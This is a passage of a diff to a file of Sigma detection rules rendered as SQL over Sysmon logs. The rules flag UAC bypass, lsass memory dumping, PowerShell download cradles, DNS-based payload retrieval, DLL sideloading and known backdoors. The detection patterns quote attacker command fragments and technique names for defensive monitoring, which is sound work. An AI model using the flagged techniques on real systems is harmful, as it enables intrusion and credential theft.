'%Usuarios de escritorio remoto%' ESCAPE '\\' OR CommandLine LIKE '% /do%' ESCAPE '\\')) AND NOT (CommandLine LIKE '% /add%' ESCAPE '\\')) OR (CommandLine LIKE '% accounts %' ESCAPE '\\' AND CommandLine LIKE '% /do%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_groups_and_accounts_recon.yml" + "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" }, { - "title": "Imports Registry Key From a File", - "id": "73bba97f-a82d-42ce-b315-9182e76c57b1", - "status": "test", - "description": "Detects the import of the specified file to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Directory Removal Via Rmdir", + "id": "41ca393d-538c-408a-ac27-cf1e038be80c", + "status": "experimental", + "description": "Detects execution of the builtin \"rmdir\" command in order to delete directories.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "author": "frack113", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Legitimate import of keys", - "Evernote" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')) AND (CommandLine REGEXP ':[^ \\\\]')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%rmdir%' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%/q%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_import_keys.yml" + "filename": "proc_creation_win_cmd_rmdir_execution.yml" }, { - "title": "File or Folder Permissions Modifications", - "id": "37ae075c-271b-459b-8d7b-55ad5f993dd8", - "status": "test", - "description": "Detects a file or folder's permissions being modified or tampered with.", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "title": "UAC Bypass via ICMLuaUtil", + "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Users interacting with the files on their own (unlikely unless privileged users).", - "Dynatrace app" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cacls.exe' ESCAPE '\\' OR Image LIKE '%\\\\icacls.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND (CommandLine LIKE '%/grant%' ESCAPE '\\' OR CommandLine LIKE '%/setowner%' ESCAPE '\\' OR CommandLine LIKE '%/inheritance:r%' ESCAPE '\\')) OR (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR Image LIKE '%\\\\takeown.exe' ESCAPE '\\') AND NOT ((CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\connectivity.history /reset' ESCAPE '\\') OR (CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\config.properties /grant :r %' ESCAPE '\\' AND CommandLine LIKE '%S-1-5-19:F%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" ], - "filename": "proc_creation_win_susp_file_permission_modifications.yml" + "filename": "proc_creation_win_uac_bypass_icmluautil.yml" }, { - "title": "Suspicious NTLM Authentication on the Printer Spooler Service", - "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "title": "Nslookup PowerShell Download Cradle - ProcessCreation", + "id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", "status": "experimental", - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", + "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nslookup.exe%' ESCAPE '\\' OR OriginalFileName LIKE '\\\\nslookup.exe' ESCAPE '\\') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -q=txt %' ESCAPE '\\' OR CommandLine LIKE '% -querytype=txt %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ntlmrelay.yml" + "filename": "proc_creation_win_nslookup_poweshell_download.yml" }, { - "title": "Suspicious Subsystem for Linux Bash Execution", - "id": "5edc2273-c26f-406c-83f3-f4d948e740dd", + "title": "Suspicious PowerShell Download and Execute Pattern", + "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", "status": "experimental", - "description": "Performs execution of specified file, can be used for defensive evasion.", - "author": "frack113", + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Software installers that pull packages from remote systems and execute them" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%bash.exe%' ESCAPE '\\' AND CommandLine LIKE '%-c %' ESCAPE '\\') AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\') OR CommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_bash.yml" + "filename": "proc_creation_win_powershell_susp_download_patterns.yml" }, { - "title": "PowerShell Base64 Encoded Invoke Keyword", - "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", "status": "test", - "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", - "author": "pH-T (Nextron Systems), Harjot Singh, '@cyb3rjy0t'", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.execution", - "attack.t1059.001", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1027" + "attack.t1218.011", + "attack.s0412", + "attack.g0001" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_invoke.yml" + "filename": "proc_creation_win_apt_zxshell.yml" }, { - "title": "Net.exe Execution", - "id": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", + "title": "Process Access via TrolleyExpress Exclusion", + "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", "status": "experimental", - "description": "Detects execution of Net.exe, whether suspicious or benign.", - "author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)", + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1007", - "attack.t1049", - "attack.t1018", - "attack.t1135", - "attack.t1201", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1087.001", - "attack.t1087.002", - "attack.lateral_movement", - "attack.t1021.002", - "attack.s0039" + "attack.defense_evasion", + "attack.t1218.011", + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine." + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% group%' ESCAPE '\\' OR CommandLine LIKE '% localgroup%' ESCAPE '\\' OR CommandLine LIKE '% user%' ESCAPE '\\' OR CommandLine LIKE '% view%' ESCAPE '\\' OR CommandLine LIKE '% share%' ESCAPE '\\' OR CommandLine LIKE '% accounts%' ESCAPE '\\' OR CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (Image LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" ], - "filename": "proc_creation_win_net_susp_execution.yml" + "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" }, { - "title": "Python Inline Command Execution", - "id": "899133d5-4d7c-4a7f-94ee-27355c879d90", + "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", + "id": "8cde342c-ba48-4b74-b615-172c330f2e93", "status": "experimental", - "description": "Detects execution of python using the \"-c\" flag. This is could be used as a way to launch a reverse shell or execute live python code.", + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.defense_evasion", + "attack.t1003.001" ], "falsepositives": [ - "Python libraries that use a flag starting with \"-c\". Filter according to your environment" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName = 'python.exe' OR (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\')) AND CommandLine LIKE '% -c%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Python%' ESCAPE '\\' AND ParentImage LIKE '%\\\\python.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-E -s -m ensurepip -U --default-pip%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_python_inline_command_execution.yml" + "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" }, { - "title": "Suspicious AgentExecutor PowerShell Execution", - "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "title": "Potential DLL Sideloading Using Coregen.exe", + "id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1218", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\coregen.exe' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Silverlight\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + "filename": "image_load_side_load_coregen.yml" }, { - "title": "Files Added To An Archive Using Rar.EXE", - "id": "6f3e2987-db24-4c78-a860-b4f4095a7095", - "status": "test", - "description": "Detects usage of \"rar\" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", + "title": "Amsi.DLL Load By Uncommon Process", + "id": "facd1549-e416-48e0-b8c4-41d7215eedc8", + "status": "experimental", + "description": "Detects loading of Amsi.dll by uncommon processes", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Highly likely if rar is a default archiver in the monitored environment." + "Likely" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rar.exe' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\ngentask.exe' ESCAPE '\\') OR (Image = '') OR (Image = '')))" ], - "filename": "proc_creation_win_rar_compress_data.yml" + "filename": "image_load_dll_amsi_uncommon_process.yml" }, { - "title": "Writing Of Malicious Files To The Fonts Folder", - "id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", - "status": "test", - "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", - "author": "Sreeman", + "title": "Pingback Backdoor DLL Loading Activity", + "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", + "status": "experimental", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.t1211", - "attack.t1059", - "attack.defense_evasion", - "attack.persistence" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%type%' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\' OR CommandLine LIKE '%cacls%' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh%' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.msi%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" + "filename": "image_load_malware_pingback_backdoor.yml" }, { - "title": "TrustedPath UAC Bypass Pattern", - "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", "status": "test", - "description": "Detects indicators of a UAC bypass method by mocking directories", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "author": "Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1548.002" + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very likely, needs more tuning" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_trustedpath.yml" + "filename": "image_load_susp_uncommon_image_load.yml" }, { - "title": "Suspicious Spool Service Child Process", - "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "title": "DotNet CLR DLL Loaded By Scripting Applications", + "id": "4508a70e-97ef-4300-b62b-ff27992990ea", "status": "test", - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", - "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", + "author": "omkar72, oscd.community", "tags": [ "attack.execution", - "attack.t1203", "attack.privilege_escalation", - "attack.t1068" + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((Image LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\write.exe' ESCAPE '\\' OR Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image 